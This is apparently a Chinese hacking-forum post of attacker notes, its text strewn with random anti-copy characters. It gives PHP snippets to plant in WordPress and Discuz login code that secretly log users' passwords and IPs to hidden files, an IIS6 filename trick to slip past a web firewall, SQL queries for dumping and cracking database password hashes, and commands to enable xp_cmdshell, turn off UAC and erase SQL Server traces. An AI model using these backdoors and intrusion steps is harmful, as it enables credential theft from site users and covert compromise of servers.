if($log_user&&$log_pwd&&$log_ip){
% |0 d. W# e7 T7 k" B1 b@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
. i& b1 K  c: ]7 j}
7 ]/ I& A4 z% z: K6 D  s当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。2 J% \: i0 b  G! U2 C* N3 O
就是搜索case ‘login’0 D9 B, D' Q0 \% m" v
在它下面直接插入即可,记录的密码生成在pwd.txt中,0 y' N% _/ w5 f/ j% M3 p
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
( y' S, K/ B5 S利用II6文件解析漏洞绕过安全狗代码:, o' G6 c% {, p- |1 P
;antian365.asp;antian365.jpg5 M) i/ ?+ ~2 H( g1 T3 D

; w6 c, N# }9 z4 B2 y6 n: B9 u各种类型数据库抓HASH破解最高权限密码!
& b: l4 x+ H! j' X1.sql server20007 B3 K3 ~( ^. s/ q
SELECT password from master.dbo.sysxlogins where name='sa'
) n+ M. S$ I, E: t+ V6 K4 P9 H0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
* L6 z( |; d, M' Y4 Z2FD54D6119FFF04129A1D72E7C3194F7284A7F3A6 {# B3 Y/ ]) l' y; C9 Q
5 |) ]8 j/ ~$ w
0×0100- constant header
. N: A( e5 R* W5 A4 E' X5 p7 V34767D5C- salt; D5 e5 z6 H: m4 q' f
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
+ P4 N; Z7 q8 v- F, K2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
- ]2 Q6 I  }5 F, wcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash# c6 `* i# i) N( E* l; j
SQL server 2005:-
6 J! e8 {! `- ]7 |3 h  nSELECT password_hash FROM sys.sql_logins where name='sa'0 }- l; G, O2 _4 O- e- O& I0 f& U
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F) f4 v) `2 g" R0 Y" }, d
0×0100- constant header
5 ^& O4 h7 W: ~  Y# [' x( v1 E993BF231-salt; `  n, E9 `+ Z( Q2 d$ i. s2 m
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
+ e5 ]8 ?/ N* K$ ~* Bcrack case sensitive hash in cain, try brute force and dictionary based attacks.
; g8 g  @  I& G/ t$ ]  C8 @9 @+ ?
update:- following bernardo’s comments:-
9 p  h' a2 y* E1 }4 Suse function fn_varbintohexstr() to cast password in a hex string.
5 E# Y; Z, ]1 \/ g, j1 we.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
, B# `/ D3 G: S" }& z* X) O
, y7 |& ?7 J# @1 ~MYSQL:-
1 W) l! Q3 A+ K) n0 T0 t8 q  t) c  r! D/ G$ a" M& J7 q% Q" W
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.* f; G- m2 [$ X9 B6 h

# b: f( v3 t5 p6 J' V* J*mysql  < 4.1
" W. J# x$ K7 h# a& ?, C& k' Q$ ^7 `7 @( I( _2 [: ^5 x
mysql> SELECT PASSWORD(‘mypass’);9 M! i9 I) w4 _! k9 ^: s
+——————–++ [' o6 I1 V, e) O) H
| PASSWORD(‘mypass’) |
* e) Q9 ]8 M, I, ~/ ~+——————–+% w2 ^# S7 s$ u2 m- E
| 6f8c114b58f2ce9e   |$ g% @, c; M. ]0 V5 n
+——————–+3 h0 o& {! T0 f) t& k0 P" Q9 G  C! _

0 K- X2 d/ m% e7 o*mysql >=4.1/ C0 V% R# ?. H: H
# x' T1 ^0 o0 ?) d# I6 g* |  Y( s
mysql> SELECT PASSWORD(‘mypass’);3 f4 i  B/ m) g/ D% C
+——————————————-+
) A# w8 b* g4 L# x! i, s| PASSWORD(‘mypass’)                        |
. F) X0 v, n8 B+——————————————-+
) a2 _* o. @$ S: _| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
$ F/ y+ w! D  Y+——————————————-+& k) U1 a7 n" ~9 L1 x
- r) w3 G2 a' n" B9 W
Select user, password from mysql.user7 R9 R+ ~8 M; I9 q; f6 O' a$ Y
The hashes can be cracked in ‘cain and abel’
7 h) _% L4 ~2 D% u. T
4 s3 J- R6 L. ~6 c9 JPostgres:-
% `' b8 o& @3 q) r2 tPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
" n2 @/ Q* O$ ]: k' M" {( `select usename, passwd from pg_shadow;( _. i# P! D) [6 @/ A- n
usename      |  passwd
# [% J/ V0 D  N8 p0 `1 s——————+————————————-4 Z* }) `  r3 E, h
testuser            | md5fabb6d7172aadfda4753bf0507ed4396/ s: m5 g" [* S0 a4 s
use mdcrack to crack these hashes:-5 U: A% Q: p  i: t1 I
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
% `5 _" b2 Q  U! H3 f
$ @3 C2 i9 J9 R" T) p0 c5 cOracle:-5 w4 o. q, k6 ~& Y2 X! O+ T0 ~! t
select name, password, spare4 from sys.user$
# W+ s: {7 a4 ?+ P" S7 Vhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
; q2 z! T. b+ _. Q1 R4 NMore on Oracle later, i am a bit bored….9 `- a, m9 c0 h, ?
7 B4 v. v8 V' G$ e2 J  m% H4 A; E

$ o+ n4 W; D! j' o* t在sql server2005/2008中开启xp_cmdshell
: @) ]& W6 y" H. K( S9 r3 ^-- To allow advanced options to be changed.# j' P# i8 a* J5 @  I$ D- s& P
EXEC sp_configure 'show advanced options', 1
8 g9 I7 f; C, L' |- T' P  @* lGO  E. H$ X1 L# Q& z! R0 u& M
-- To update the currently configured value for advanced options.
6 N. u$ i2 r2 Q9 o5 o# a  ]1 lRECONFIGURE5 F' |' I8 [( x" ]: Y
GO
( a4 ^2 c2 L- `/ e7 ]3 j-- To enable the feature.
- k$ [& S4 |- ~) {( jEXEC sp_configure 'xp_cmdshell', 1) ?: d$ s3 H6 b- J
GO6 C, n! L3 I1 C9 j% H: i* c
-- To update the currently configured value for this feature.
0 Z' L+ u& k( H" @! X( [5 F' nRECONFIGURE
# o, `% a' o% H& G3 |1 zGO
; Q5 U# A- j0 F1 \0 QSQL 2008 server日志清除,在清楚前一定要备份。8 m' t/ c, b) z# U2 T
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:/ }' k5 O3 N) N) S- _
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
( v5 A, i: R# ]2 k% j# v5 Y9 @3 W; g& u2 O! B3 K* Y- l+ C
对于SQL Server 2008以前的版本:: x3 t) n9 ?; W- q1 _
SQL Server 2005:
# I: s% r  W. T删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
  _0 H, O/ S- B1 qSQL Server 2000:
* F) d4 O) h, b6 P9 e" F清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
; i3 h9 Z9 n' ]8 T) I+ K, q' D7 t' ]& V9 M* f
本帖最后由 simeon 于 2013-1-3 09:51 编辑5 |0 c/ ~3 t. T/ F8 j$ R; Z* K" q; |! e
# Y" }9 X2 j9 F; l

. e1 F" N- \1 ^& l0 I- Y6 ^. Twindows 2008 文件权限修改
3 g4 ]* m9 S' |  l6 L1 {! ]1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx: S/ y  t1 Y- k. M' b8 R5 ^
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
3 w% G- s0 r, N/ e& W- h一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* J8 \& A$ U9 R: o7 z* _  H4 T

  t; \7 n5 S# r; z9 CWindows Registry Editor Version 5.00
3 d# {3 D9 U3 \9 S[HKEY_CLASSES_ROOT\*\shell\runas]" l) h. F. h' U$ H$ X
@="管理员取得所有权"# e& |  \5 d% ?- S7 Q3 W
"NoWorkingDirectory"=""
6 d) O" {+ P: }/ @- f[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 Z* i% D1 S& _( Z" Q( }! A/ r@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 E' }! n8 _( D8 Q; g2 N9 C# K
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. _7 ]  x* T- |# m. H" \[HKEY_CLASSES_ROOT\exefile\shell\runas2]
! t, p) g* a2 t- \7 _@="管理员取得所有权"
. ]& O# Q+ c* F- m0 J- Y"NoWorkingDirectory"=""
/ n; K/ z/ A  a( a$ u, v; R4 g[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]# ~. x0 c1 |3 X% d- e# B+ x3 U, S
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# Y$ H. s( {/ }7 |0 _
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ j! p3 ]# P% @' U# @4 T( L/ P
: K4 p! h2 G4 o# _3 R
[HKEY_CLASSES_ROOT\Directory\shell\runas]( @4 i1 m2 k0 e7 Q9 \  U' J. w
@="管理员取得所有权"
. p* v- f5 b$ o, A8 @"NoWorkingDirectory"=""1 K' I. G5 ^  E0 ?$ r
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
, C/ \  K! ?1 K@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 r. Y! @7 r5 Q3 Y" S"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
( w) b7 w; J) x, O- n9 {, D6 g2 I/ v, h  r

, k- a4 M- K9 M$ Awin7右键“管理员取得所有权”.reg导入
! |2 d" r- j1 g' \; C7 @% _( I二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
6 r$ R2 h' B( ?, `* l; V. h4 A1、C:\Windows这个路径的“notepad.exe”不需要替换
# P, c/ Y# q/ I2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 _  c0 x+ Z) q0 ~  Y4 I" \7 a
3、四个“notepad.exe.mui”不要管. K/ t1 F! W, {
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
9 m- q3 g. V$ j2 P3 u- t  Y$ MC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
: N' [/ A7 R& f# C替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,2 ]6 p( L0 M- Z# ]! ]
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
6 F! t* g# {9 K. a4 b. rwindows 2008中关闭安全策略: , p: J) `: [0 `6 z
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, O2 \* W* w% y9 h: w
修改uc_client目录下的client.php 在% |" J. v% z; H/ p& C' e0 m
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {4 x% Y/ z. B! V. k# s
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php2 ?- \3 e4 z0 B5 t5 v+ C
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw- ^. y  [  h: }" Q# O
if(getenv('HTTP_CLIENT_IP')) {
& S. O+ M2 [$ u$onlineip = getenv('HTTP_CLIENT_IP');0 f% G- M- Y5 C, `. I; r
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {5 L* l3 s( d# u9 `0 Y
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
3 c, I! z. d; [0 ^& Y2 M3 D} elseif(getenv('REMOTE_ADDR')) {
* y7 Q' v6 B' r4 C- v: M& U: L$onlineip = getenv('REMOTE_ADDR');
$ a! R. |* u$ ^. W- \8 q" ?} else {
' V+ ~& M& s/ X9 ]# E% x% E( n$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];( @7 I) c$ Z0 `$ s% [" R6 {
}3 T, w! z7 ]& u7 n8 p5 w  h, s8 v
     $showtime=date("Y-m-d H:i:s");
/ B& Z( b$ o  M* m+ n    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: z$ a2 `5 F) d. c  n    $handle=fopen('./data/cache/csslog.php','a+');
1 a" n# a" d  i; g& Y& C    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2